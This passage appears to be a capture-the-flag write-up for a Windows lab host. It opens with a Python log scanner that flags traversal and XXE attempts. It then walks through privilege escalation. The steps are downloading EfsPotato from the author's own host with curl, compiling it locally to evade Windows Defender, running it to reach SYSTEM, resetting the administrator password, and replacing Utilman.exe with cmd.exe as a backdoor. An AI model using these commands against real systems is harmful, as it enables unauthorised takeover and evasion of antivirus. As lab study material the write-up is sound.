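    """True if value holds a '..' segment once %2e/%2f escapes are undone.
    One unquote() round suffices for IIS-logged query strings."""
    return bool(DOTDOT_SEGMENT.search(unquote(value)))


def parse_query(query: str) -> dict:
    """Split 'a=1&b=2' into a dict; '-' is the W3C placeholder for empty."""
    if query == "-":
        return {}
    return dict(p.split("=", 1) for p in query.split("&") if "=" in p)


def classify(line: str):
    """Return a finding label for one log line, or None if it looks benign."""
    parts = line.split(" ")
    if line.startswith("#") or len(parts) < 8:
        return None
    method, stem, query, status, cookie = parts[2], parts[3].lower(), parts[4], parts[5], parts[7]
    params = parse_query(query)
    if stem == "/blog/api/filemanager" and has_traversal(params.get("path", "")):
        return "filemanager-traversal"
    if stem == "/blog/syndication.axd":
        # The endpoint expects a local APML document; a URL to another host is
        # the out-of-band XXE trigger used in this writeup.
        apml = unquote(params.get("apml", "")).lower()
        if apml.startswith(("http://", "https://", "ftp://", "file:")):
            return "syndication-remote-apml"
    if method == "POST" and stem == "/blog/api/upload" and status == "201":
        # Legitimate for admins, but the file it stores under App_Data/files is
        # what a later theme-cookie traversal points at; keep it for correlation.
        return "upload-created"
    for crumb in cookie.split(";"):
        name, _, value = crumb.strip().partition("=")
        if name == "theme" and has_traversal(value):
            return "theme-cookie-traversal"
    return None


def scan(log_text: str) -> list:
    """Return (label, client-ip, uri-stem) for every flagged line."""
    findings = []
    for line in log_text.splitlines():
        label = classify(line)
        if label:
            parts = line.split(" ")
            findings.append((label, parts[6], parts[3]))
    return findings
```

Run `scan(SAMPLE_LOG)` to get the flagged lines in order; the two benign lines (a local apml path and the default theme) produce no finding.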

Privilege escalation

The host also has the users kingarthy and Administrator.

The merlin user has SeImpersonatePrivilege. I tried uploading PrintSpoofer, but hmm, it seems files cannot be uploaded; perhaps they are being killed, since curl to my own host works.

I tried RDP with kingarthy's password from earlier, and it was reused. Only once I had a GUI did it become clear that the earlier uploads had been blocked by Windows Defender; print.exe gets detected.

This one can be compiled locally to evade detection:

https://github.com/zcgonvh/EfsPotato

Back in the reverse shell, in merlin's user directory, since only merlin has the impersonation privilege:

curl http://10.10.4.48:53/EfsPotato.cs -o EfsPotato.cs
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe .\EfsPotato.cs -nowarn:1691,618

Compile with csc, then run:

EfsPotato.exe whoami
C:\Users\merlin\Desktop>EfsPotato.exe whoami
Exploit for EfsPotato(MS-EFSR EfsRpcEncryptFileSrv with SeImpersonatePrivilege local privalege escalation vulnerability).
Part of GMH's fuck Tools, Code By zcgonvh.
CVE-2021-36942 patch bypass (EfsRpcEncryptFileSrv method) + alternative pipes support by Pablo Martinez (@xassiz) [www.blackarrow.net]
[+] Current user: EXFILIBUR\merlin
[+] Pipe: \pipe\lsarpc
[!] binding ok (handle=fc09d0)
[+] Get Token: 872
[!] process with pid: 5100 created.
==============================
nt authority\system

Now we are root!

EfsPotato.exe "cmd.exe /C net user administrator admin123!"

Change the administrator password and connect via RDP.

Method two: use kingarthy's SeTakeOwnershipPrivilege to take ownership of a file:

takeown /f C:\Windows\System32\Utilman.exe
icacls C:\Windows\System32\Utilman.exe /grant kingarthy:F
copy C:\Windows\System32\cmd.exe C:\Windows\System32\Utilman.exe

Afterthoughts

A really hard room: from using the exploits and the XXE file read to the file upload. Getting the exploits to work was also quite painful, and the firewall and antivirus raised the difficulty considerably. Windows really is harder.